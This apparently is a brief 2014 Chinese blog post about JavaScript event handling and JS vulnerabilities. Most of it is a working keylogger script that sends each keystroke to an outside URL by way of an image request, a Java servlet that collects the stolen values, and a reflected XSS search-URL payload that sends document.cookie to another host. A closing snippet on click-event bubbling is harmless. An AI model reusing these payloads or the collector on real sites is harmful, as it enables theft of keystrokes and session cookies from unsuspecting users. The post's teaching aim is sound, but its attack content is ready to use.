日期:2014-05-16  浏览次数:20392 次

js页面事件响应及js漏洞示例
js:
<script>
function keylogger (e) {
document.images[0].src="http://www.ckfinancing.com/study/cookie?cookie="+e.keyCode;
}
document.body.attachEvent("onkeydown", keylogger);
</script>

servlet:
http://www.ckfinancing.com/study/cookie?cookie=

public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
response.setContentType("text/html;charset=UTF-8");
String cookie = request.getParameter("cookie");
System.out.println(cookie);
}

<==========================================================================>

http://a.com/search?keyword=<script>document.images[0].src="http://b.com/xxxx?cookie="+unescape

(document.cookie);</script>

servlet参考上面例子
<==========================================================================>

js页面键盘事件响应
<script type="text/javascript">
        //FF,Chrome
        if(window.addEventListener){   
            document.addEventListener('click',function(e){alert('document');},false);
            document.body.addEventListener('click',function(e){alert('document.body');e.cancelBubble=true;},true);
        }
        //IE
        else if(window.attachEvent){
            document.attachEvent('onclick', function(e){alert('document');});
            document.body.attachEvent('onclick', function(e){alert('document.body');e=e||

window.event;e.cancelBubble=true;});
        }
</script>